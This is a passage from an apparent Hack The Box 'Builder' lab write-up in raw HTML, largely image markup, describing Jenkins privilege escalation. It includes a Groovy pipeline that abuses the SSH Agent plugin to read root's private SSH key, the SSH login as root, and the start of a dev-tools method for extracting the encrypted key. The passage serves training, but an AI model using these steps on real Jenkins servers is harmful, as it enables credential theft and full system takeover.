url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABpElEQVR42qWQzWtTURDFLyELycJmJy6Mu7qVrP2jghv/GcW1K0Vom9qS9sUkFEKTEioKEmvTxi6eSd/3R97Hz7mvLypx6cDhzJ17z7kzo541n/Jke5tms0mj0UApRaVSoVqtFnmr1WI0GmEYXXq9PoNBn7GcX756zaMHdR7W7/G4tsX9+ha1Wg21v3fA4eERnY7B7u4+7fYHdnbagr2C+/0Tzs4mDIcjTk/HBc7PPzOZfOL4yOCke8yoZzAcfKTXNVCrVUIUxcTxijCM0Oe/kWUZOvI8l/wOOs+5iy8mHEyhM835ugBlmj+ZTr8xn//g4uI7s9kV19fzgi8vZ/JJWJplv1EYlo5vxgHP31q8eG/zbhKgdGee5+PYrnCALXx7a+O6UnNclksLy3KKuub1ndZpTtNEbLMSuR45FaEvj10ZfSVCD9NciiBlsbDE0Mb3IxEH8mEob5ICtu1zc2NKPZQp5OzG+MJKt+3YDmm5Kz1SmqZFniRJ0b3vByL0CIKQzVjv0olyvChDafHaJI6Tcj9/8I/Bxv3mW6W70GZpmqHH/9/4BV/Hh5tAaYkzAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Global credentials root user" title="" src="/static/ac0ba44387bbf2f6261b97b5878aaadf/50637/global-credentials-root-user.png" srcset="/static/ac0ba44387bbf2f6261b97b5878aaadf/dda05/global-credentials-root-user.png 158w, /static/ac0ba44387bbf2f6261b97b5878aaadf/679a3/global-credentials-root-user.png 315w, /static/ac0ba44387bbf2f6261b97b5878aaadf/50637/global-credentials-root-user.png 630w, /static/ac0ba44387bbf2f6261b97b5878aaadf/1995d/global-credentials-root-user.png 942w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To check the installed plugins, I went to <code class="language-text">Dashboard</code> → <code class="language-text">Manage Jenkins</code> → <code class="language-text">Plugins</code> → <code class="language-text">Installed Plugins</code> and found <code class="language-text">SSH Agent Plugin</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c8babd6523f8ed7ed62673d7cda83fd1/4de97/jenkins-installed-plugins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 77.21518987341771%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACJUlEQVR42nVUy5KbQAzk//8k35BLbjkmx71tbdYLC+Y5L2BendZgO05iT5VKlJB6WlJDpZSFMa7YOC7Qmn7SUHqFW32x9Ym5dce2eVq4WTXPC97efsG5FXIk2A+GoBbDqIsXcGO2m2m5zO3wISLlXOpwcZX3HkopiJcTY8JsPEbtMdE7t8FaAtL2PTDvsECwmBIyAQXzsIzKOccbNVtYSyDGiM9uwKnpcKrb0r51MhJLYFdMatZ1QzPMCCRQCLIu8YJqmhbU9Rnv7w36fmYwQ7mIxQX6ALfHwlqSr1TyE5NaAip8fLQErHE+j2Um7WhQDxrNtKI1CaOSeU6F3f2p7xiyf4KSYQiBs/Hwuww5IHE5ZlDQBLWjeA2/aCSOJRsD9gsiH7ZzkZYxict7vqtu1122lZTmDEc05xnzTMBlwTTOWBYFow0UwS29PH/5+h0z2Zc65mbmPATsTh3GbiosFdkKw0AlRLJIZCNMxfdNW+KFNS/O6h7wcmQBba/w2Wu0nOPMpS0T2ZKlsHVkZkUVbPnny+uhX1nKtnPT6X9A2eZA+oaykA2bLcLHWOQk8z7seP724wWGOi11zM/pISBls3KzNlDYgQV70dwmDK5fxTX3Ipc/U8sPWuYt3WRKuyKfljNcOEMR9r+AA+OSf2HyjGHCsoqwI5nt5QcgspL40fbxRcixZJ5ugPkxQ0nop4NZ8T2Xws2LTCwXofh8/ZGMyiD8xTDjN7BakFSlou5WAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Jenkins Installed Plugins" title="" src="/static/c8babd6523f8ed7ed62673d7cda83fd1/50637/jenkins-installed-plugins.png" srcset="/static/c8babd6523f8ed7ed62673d7cda83fd1/dda05/jenkins-installed-plugins.png 158w, /static/c8babd6523f8ed7ed62673d7cda83fd1/679a3/jenkins-installed-plugins.png 315w, /static/c8babd6523f8ed7ed62673d7cda83fd1/50637/jenkins-installed-plugins.png 630w, /static/c8babd6523f8ed7ed62673d7cda83fd1/4de97/jenkins-installed-plugins.png 941w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">SSH Agent Plugin</code> is designed to manage the use of SSH credentials within a Jenkins job, allowing for commands to be run over SSH during the build process. This could be leveraged to print the private SSH key for the <code class="language-text">root</code> user. To do this, first I went to the Dashboard page and created a job:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2429a41a912de8b5966ffa054bace419/86e67/create-a-job.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABk0lEQVR42pWT6XKjMBCE/f7Pl3LlRw7bHMLmEAKELnDvzKyT2FVbrKOqD0kg9UyPxA7U8rzAy8seb28fOBxOOB4z7PeveH//QIwRv2k7fjjnYMyAYRgxjhOmycqcxzEmEWVSehz/JSKEIONvwa7TOJ1yKHWWbJWqkGUFjUsURSnfte4p4CB93xsJznDgtu0kiW9BH7y8mKyFnWfqZ1hmZhyu119a1k0LdcqQH45QWY5LqWRe5TnOlPFCJQFb4npuQZF3vHAlQVu3mInQ9VjM+MMwIWiziWeqC8gWCZLyWjfoywqmUIg3wUR1Cq2GJzjIFo7WOHJFdfuy3IjNkuzmn0dknwdc6DDE5rMs6WaZWqQXno4+ULY+RDgfpOezeIb1ylx/DiXGhY6+R113dEUMzVe6Wwu8T/+F1w2Dlf0PgloPQt+PdNHDU2JfWBuofO5eMEl2HIVhwZQWgjPlTXETax39VXcXmzfVtUbTaBFW6oKqqukvOUvWnIVz8Z/wN2OmR8vrut5sBunv4WCc6RacJa9lwT91pj54qYF+BwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Create a job" title="" src="/static/2429a41a912de8b5966ffa054bace419/50637/create-a-job.png" srcset="/static/2429a41a912de8b5966ffa054bace419/dda05/create-a-job.png 158w, /static/2429a41a912de8b5966ffa054bace419/679a3/create-a-job.png 315w, /static/2429a41a912de8b5966ffa054bace419/50637/create-a-job.png 630w, /static/2429a41a912de8b5966ffa054bace419/86e67/create-a-job.png 690w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I chose the <code class="language-text">Pipeline</code> option:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6b97776dd320d7f6e2ce4bf0b5c45f0b/a87bb/pipeline.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 96.83544303797468%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADAElEQVR42n2Uy27bRhSGCaTbJpukRYLAu66CAMnORZBm0ddIgALpA/Rl+hpZZpN1YsdwUN9kO4mtCymKoihehsO7Ln//M5SExHUt6NM5HM788/OcEa1fnz7Bi2fP8Py3F9je3sbdu/dw+/Yd3Lr1A16//hOdTgc7O7v4+HEP+58+YX9/H6enp3j56g/8cv9HPHr4EI8fbOHB1hZ+uvczrN2dPXx4v4ujoxMcH3dweHiCw4NjHPxzRLEzXFx0cfG128Zv6Jyc4YjzDIfHm3XWYrFEM5tjPl9Ccn6/+yyXLYsrLK/MW8+1tM7x+XMPl10HX772GW2otECicoNakXLsJpQqkOcVrKKoeJGhrmeo6gZV1bTxG4qyRpaVpPpftK5Qlg0FOTmKFKJYmR1kUGJG8hWSa13eSJqWrWBVVRj5E4omiCkaxwmKoqTT+j+UpVBdy3qNVZas4cE7dHvs3Ok5OmfnsIcuvLGP0XhsGE8m8Hwf/iTANAwRTENMSMB8EkwNYRSzuTNYjdbQXBTajiHjQuWOkLgu1GiEmOLmmjGn4FwpzJLEMJcYUyiKUFNctKyKyv2hD9txMXSGUIlCqlIkfPR1LlGuhZjzIwrEFArpUu7pVPPYzbHgZpbstFQxNOuoRp5xlDAKrdNROy6OPc+QemNDRAMFRRd0Johjcw7fvj9Dv2cjnk5RZBk0d8rTFNkmtrmgV9Hck3KpBCmFUnnsmk2p+ONHGRw6u7jsoj+w4dKVw91t4tKdy1pKLvfs1fiQc4ZcI+tGdBtT1AjKj6KLQLrFokvM6LJpGjOhaWqTX0XuyZETJG/nrs5hnw2RXQeDAS4ve4w2wjAyxZcoTFkraYSMBUGAhI7WgmuMoBzKgSOP6GLQH6BPPCk8O6ekw6xVG1OOtTHLch7k4npBOeFDx0EcBvB5mD3WY8y4diUlCMN441Qcrh/zesGqRC/QOPcyROy4/L2Kotn8j4ui3uQt6xfF92hdmLVWUef4602A3//2sdeLMeMGqa5ufLPc9Lb5F7dwgN8r2UdWAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Pipeline" title="" src="/static/6b97776dd320d7f6e2ce4bf0b5c45f0b/50637/pipeline.png" srcset="/static/6b97776dd320d7f6e2ce4bf0b5c45f0b/dda05/pipeline.png 158w, /static/6b97776dd320d7f6e2ce4bf0b5c45f0b/679a3/pipeline.png 315w, /static/6b97776dd320d7f6e2ce4bf0b5c45f0b/50637/pipeline.png 630w, /static/6b97776dd320d7f6e2ce4bf0b5c45f0b/a87bb/pipeline.png 871w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the configuration page, I added the following Pipeline script:</p> <div class="gatsby-highlight" data-language="groovy"><pre class="language-groovy"><code class="language-groovy">node <span class="token punctuation">{</span> <span class="token function">stage</span><span class="token punctuation">(</span><span class="token string">'SSH'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token function">sshagent</span><span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'1'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> sh <span class="token string">'ssh -o StrictHostKeyChecking=no root@10.10.11.10 "cat /root/.ssh/id_rsa"'</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span></code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d6f12946b7e0ff2b85747ef18f6ea138/3fb4e/scripted-pipeline.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 78.48101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABSElEQVR42q1TSW7DQAzzs/q6fqHPKdA/9Nxe8oF4Gcf2LJrFDEdOghyz2AAheTygSEluuq5H13XY62mstfA+7EfYDwbHtoMPASmXJ5FvCCIopaARiZiXRVWWsiLz4qOo98u6oZKujE1N5mlW5JzAzw/bixTjnENtm9ChEmYSLlQYeDCOBr050r5FjJ5VgyKXuCELo2he1kRnJ/RDC2MMHfqLwpQxDAMJIpEQ+CGIJRa4MMH5iQUmfQ8yI0SqiQ4iNbJw8rS+2dWhVMJxHFVhSglVcT2rcUO5yy9IG5Ii3XDroXBC1wpvr02tcvW/C6EOhVOyXBsfROGY2xeglodpwe/fAXaZtZfGjLrkmUv6LFShRA7FRkyevWR+P7GXLMe84hRWuAju1g49/Pye8PHV4udfkNzCZfXvER7ngkPLwVDlWrL+4O8QngEiHOwhqbWSGAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Scripted Pipeline" title="" src="/static/d6f12946b7e0ff2b85747ef18f6ea138/50637/scripted-pipeline.png" srcset="/static/d6f12946b7e0ff2b85747ef18f6ea138/dda05/scripted-pipeline.png 158w, /static/d6f12946b7e0ff2b85747ef18f6ea138/679a3/scripted-pipeline.png 315w, /static/d6f12946b7e0ff2b85747ef18f6ea138/50637/scripted-pipeline.png 630w, /static/d6f12946b7e0ff2b85747ef18f6ea138/3fb4e/scripted-pipeline.png 862w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I clicked <code class="language-text">Save</code>, and on the following page, <code class="language-text">Build Now</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3fa1ad1572578060313851232eaeae30/78bef/build-now.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 87.9746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAABmklEQVR42qVUi26DMAzk/39xk9p1K28SGvIgJHCzI7UqBW3tZukwAXKxzzZZnlcQQkFKBaUsrPUrGDNunv2EzBiHaYoYx0A+IIR4Q4wz5nl5Cdn7+wmHw5mi1LhcHPreJkhp6ZAJx+MHRT6AbVkW/GaZGjTaVtBmD/7+/jQmiDE+RXQj9EUBU9dgT7s3HzDZFU8RXj5OaA9H6M8v2j3jv5YJIamSNqW8F11VVsjzAlVVp/R/JWzbjoqhwN5atxKfr3XToaxbNJ2EDwGcQ1yuIK0fpMi0NqmKHOk1yhsheeEmlINDQT2a9wZfYsBZGrq3OBOEC2tCTtcYQ30XdlN2YYahPmVoH6HoAMZAfcveTmvds64TKV0hBLxfRzjPM8qixIkKx/24d+hGQ06TxeYpYYJHc85Baw2WZu/9hnAJOhWl7y9p3NhYUyb5U9uEyadi8JgF0ovn97rmaXmZUKmRiuLRND3e3o6kZ5/WWo9P9d2OhlP60ziqGP+q2POawdG+TChlT9G1qQ/5nite103SdVn+oOH98G/xOuE3FMiGpWQQyM0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Build Now" title="" src="/static/3fa1ad1572578060313851232eaeae30/50637/build-now.png" srcset="/static/3fa1ad1572578060313851232eaeae30/dda05/build-now.png 158w, /static/3fa1ad1572578060313851232eaeae30/679a3/build-now.png 315w, /static/3fa1ad1572578060313851232eaeae30/50637/build-now.png 630w, /static/3fa1ad1572578060313851232eaeae30/78bef/build-now.png 771w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once the build completed, I clicked on it in <code class="language-text">Build History</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/87402d3c8741045cdc5fa2fd1b6676d4/99285/build-history.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAABw0lEQVR42qVUi26jMBDk/7+vUq9NcxdICQEcHgY/ecztmjZBTasg1dKCsezZmd3BUV1LFEWFvtfguTH+Glo7WDtc51siMsYFIAa01sO54RrDMEIpResOPOZ5fhgRg+33R2TZBV1nIaUJ0bY6sCuKgubyCvhoRMPAkgwx7Dcd2ATIYHXdBIm/BrTWkqQWTdNgHKe7DZzQex9ik+S+V6iqKjCUsrvbkOcFDocYaXoK4A8BnXPUjC6wlFLiKwn+/uzgejGUihygqf7rRNE4LtbQWoPnP41pmsDJF/kD7VfkjAxlWVJT9Q2QO8xym6alA37NLTwdNcpQnYUQSJJjkM5WitMznnaHEKKqb4CcraM6KqUD02maP2QuG8q6xykXKPKcEi8HJ2peqk94bl7wR75C2MsNEDNJcCqY1xobFj1JYyuxTEZmmVxfrvUn+cxk2HU7vPU7XMwK0NLhVipI5aDsCOtneg+UQBHQGBJVJEmIaknwMZx3MM6G8OumdGmK9l8Ml2aQ9G7/HqDiIxz942x0BsyyM87nYpttOlGiSt9RE7BIEog4wYWCbfSd0R8CUg9gqEaabhRPjCyx0I6vInN3w2wB/A9ioOM5y/Gu0AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Build History" title="" src="/static/87402d3c8741045cdc5fa2fd1b6676d4/50637/build-history.png" srcset="/static/87402d3c8741045cdc5fa2fd1b6676d4/dda05/build-history.png 158w, /static/87402d3c8741045cdc5fa2fd1b6676d4/679a3/build-history.png 315w, /static/87402d3c8741045cdc5fa2fd1b6676d4/50637/build-history.png 630w, /static/87402d3c8741045cdc5fa2fd1b6676d4/99285/build-history.png 805w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I viewed the <code class="language-text">Console Output</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/03757c529a686b03989045a6543181bd/e1040/build-console-output.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABL0lEQVR42q1Sa3ODIBD0///CxkeNbVIzRiMiKAK6vcOxtdMPfSQ3s7NwB8vBEpXlFV2n0LY9sYaUGuNoMQxT4G28zrfcZ21fZ0RSqrDAGItpcrCWMDsYyzneaCg/EWwA5zYehjHU53n+QJRmJ5zOV4huxK2l7gaH2gqc6wvipxhpmhGeEccJiuIVh8PKx2OBLMuR5wX2EalOoq0beDoV84JlIWBlPpHZOwdH8DT33u86Wtd9EZR5DlG8QNCJrqpCMoh4FsOfI5JvJVRFxpQXaGIWM8YgSVJorckoSUb1ENrDuF8ICtrQK3K37wOvV1ogRBfGbBJf1/qFX+RnwYq64s3cibUW9wZ9G+qwV98Ky38ekAXbVkApFTpk5+7usGluYLDgIyJy2x8jAx4iiAfHOxeX/DquVxIVAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Build Console Output" title="" src="/static/03757c529a686b03989045a6543181bd/50637/build-console-output.png" srcset="/static/03757c529a686b03989045a6543181bd/dda05/build-console-output.png 158w, /static/03757c529a686b03989045a6543181bd/679a3/build-console-output.png 315w, /static/03757c529a686b03989045a6543181bd/50637/build-console-output.png 630w, /static/03757c529a686b03989045a6543181bd/e1040/build-console-output.png 792w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The SSH key was printed in the output:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a2370ed9dd218fa19e2c20b5a44d17a4/78899/build-console-output-ssh-key.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 84.17721518987341%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACJElEQVR42pWTB5OqQBCE+f//7MpSzwjmRBIlJ0HOfjOD6/nO8gWqupZl4dvumUULwwRRlCJNC1FVXlHXDerrF66kqmpQlvU/SyvLEpfLBerKmhLnMIDruLBtG2EY4n8uLctyJEmKpvmSB2V1QZwk9CxBSM7zvEBzvZLbb9V1/aKqqojRQPO8APu9g93ORpZVAl8tVzAtFwfXh+ud4Ps+KZAxCALEcfyiKIrAabXLpaJJTNFi2qUmaEbwHRzPx9mPcPI8HI9HuC7Lxel0IkCb4FkM5dJpaZqKKx45TlHk9w89BFQ/3iDLOHou4nn7zRsgv8B2VWN498lEx3K5xny+wGq1xmazxeFgwjSte/w2+luHPOH8fLFbXZ8JwKFOm2YLMk2buu4IzKMynM9ncar05DCnSUrA1iEfk/F4KtDtdkcNO1BN97TBQWCcRjVBNYq/eQBvtxuUWmCEfn8Aw2iBlmU/4rbNccUhN8lxHElxPHqPsmk/DyYX3rIsicS7FkXx0hCl5/nDoQLdDcrier2hZqyoKUvMZotHdB7ZqXLNI8d9A2yJbH0wGGI4HOHzcyj3XE/uuNJisRRxbAb91uWfQK7heDyRGuq6gelUFwhD+ThNJlNaM+QdrinH/iMwCEJ0u31xpxz2ep+iwWBEaz10Ol18fHQk/l+BHHk0GosTdsEu1T27Zse8zuLuqr/mLZAXOBqDZrO5xGWIYXzft5vodHxOL8BfL4wFEZVALVUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SSH key in Build Console Output" title="" src="/static/a2370ed9dd218fa19e2c20b5a44d17a4/50637/build-console-output-ssh-key.png" srcset="/static/a2370ed9dd218fa19e2c20b5a44d17a4/dda05/build-console-output-ssh-key.png 158w, /static/a2370ed9dd218fa19e2c20b5a44d17a4/679a3/build-console-output-ssh-key.png 315w, /static/a2370ed9dd218fa19e2c20b5a44d17a4/50637/build-console-output-ssh-key.png 630w, /static/a2370ed9dd218fa19e2c20b5a44d17a4/fddb0/build-console-output-ssh-key.png 945w, /static/a2370ed9dd218fa19e2c20b5a44d17a4/78899/build-console-output-ssh-key.png 1072w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the key as <code class="language-text">root.key</code>, changed the permissions to <code class="language-text">600</code>, and logged in over SSH:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ chmod 600 root.key ┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ ssh -i root.key root@10.10.11.10 Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64) &lt;...snip...> root@builder:~# whoami root</code></pre></div> <h5>Priv Esc Method: Decrypt Key from Global credentials</h5> <p>As shown in the previous method, an SSH private key credential for <code class="language-text">root</code> was stored in <code class="language-text">Dashboard</code> → <code class="language-text">Manage Jenkins</code> → <code class="language-text">Credentials</code> → <code class="language-text">System</code> → <code class="language-text">Global credentials (unrestricted)</code>. I clicked update:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/77ef0cb9de337843c2a6222d1a8b30d7/1995d/global-credentials-root-user-update.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABp0lEQVR42qWQTWsTURSGLyELycJmV1wYd3UrWfdHBTf+GcW1uyK0TW1JOzEJhdBJCRUFibWxacExaWYm85X5eDx3MqlSlx54Oeeee973fKjt+gueb21Rr9ep1WoopSiVSpTL5TxuNBqYpolhtOl0uvR6XQbyfv3mLU83qzypPuJZZYPH1Q0qlQrqYP+Qo6NjWi2Dvb0Dms0P7O42Bfu573ZPOT8f0u+bnJ0NclxcfGY4/MTJscFp+wSzY9DvfaTTNlDLZUwYRkTRkiAI0e+/kaYp2rIsk3gFHWes7IsFhyNojTK+TkFZ1i9Go29MJjdcXn5nPP7B9fUk91dXY2kSFGLpPXLBQvHdwOflzpxX7212hj5KT7ZYeDi2K97HFn93Z+O6knNcZrM587mT57Vf/2me9kmSiKwgW20iKydC9KTYldWXQlxgWTMhJEyncxG08bxQyL40DKQmzmHbHre3P3EXIYHk7ZspXhCjtKpjOyTFrfRKq64Qx3E+vef5IrjA9wMe2vqWjie1YYrS5LVIFMXFff7gH4EH//co/pWeQoslSYpe/3/tNz/Uh3k0NgHKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Global credentials root user update" title="" src="/static/77ef0cb9de337843c2a6222d1a8b30d7/50637/global-credentials-root-user-update.png" srcset="/static/77ef0cb9de337843c2a6222d1a8b30d7/dda05/global-credentials-root-user-update.png 158w, /static/77ef0cb9de337843c2a6222d1a8b30d7/679a3/global-credentials-root-user-update.png 315w, /static/77ef0cb9de337843c2a6222d1a8b30d7/50637/global-credentials-root-user-update.png 630w, /static/77ef0cb9de337843c2a6222d1a8b30d7/1995d/global-credentials-root-user-update.png 942w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the <code class="language-text">Update credentials</code> page, there was a Private Key section with a key that was concealed for confidentiality:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7574d3fd8d1da14f8f21b7ab981bb307/e134c/update-credentials-private-key.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.9746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAA2ElEQVR42q2RTQrCMBCFeziv5gFcuPUcuhIXegBxVXAjuNBW2qa1Ne1knjOpSgtFkBoYHvn7Mi8vcM6hrmswM/4xguPpjMvliqIo0DTNeOB2H8LkBYwxqKrqp8tOTDXc6gdYS1e5ALvjbV/1W71O9+YeqHazLBNwjjRNfbeqSZKgLEtYa3v1eFgwWWzCO6arFMtDLiiCIgOSULTDKIo8JI5jAane/Jo+pqF1gZUAwRaLncFkHmG2zjxQrQfaKpGDpt0Wd7TdI6LBYnb6k3KO/B1veUyiQ6E8AVuncu2+fDgUAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Update Credentials page Private Key" title="" src="/static/7574d3fd8d1da14f8f21b7ab981bb307/50637/update-credentials-private-key.png" srcset="/static/7574d3fd8d1da14f8f21b7ab981bb307/dda05/update-credentials-private-key.png 158w, /static/7574d3fd8d1da14f8f21b7ab981bb307/679a3/update-credentials-private-key.png 315w, /static/7574d3fd8d1da14f8f21b7ab981bb307/50637/update-credentials-private-key.png 630w, /static/7574d3fd8d1da14f8f21b7ab981bb307/e134c/update-credentials-private-key.png 704w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Inspecting the element in dev tools revealed the encrypted key:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 605px; " > <a class="gatsby-resp-image-link" href="/static/2ab903a8a58ecf4c9fcbb4f25c0d2800/0af3a/encrypted-ssh-key.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: 